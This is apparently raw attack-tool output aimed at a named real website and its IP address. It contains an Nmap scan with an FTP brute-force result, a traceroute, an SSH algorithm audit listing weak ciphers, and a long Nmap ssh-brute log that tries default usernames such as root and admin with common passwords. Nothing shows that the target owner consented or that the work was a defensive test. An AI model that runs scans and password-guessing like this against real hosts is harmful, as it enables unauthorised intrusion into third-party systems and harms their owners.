- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:25 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 634 guesses in 204 seconds, average tps: 3.2
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 166.62 ms 10.253.200.1
- 2 168.18 ms 213.184.122.97
- 3 166.72 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 167.01 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 219.62 ms bzq-219-189-126.cablep.bezeqint.net (62.219.189.126)
- 6 219.67 ms bzq-219-189-230.dsl.bezeqint.net (62.219.189.230)
- 7 220.75 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
- 8 216.88 ms et-0-0-5.cr10-fra2.ip4.gtt.net (89.149.136.117)
- 9 219.71 ms ip4.gtt.net (213.254.196.10)
- 10 271.97 ms 134.222.104.205
- 11 264.88 ms 134.222.104.205
- 12 270.60 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:29 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
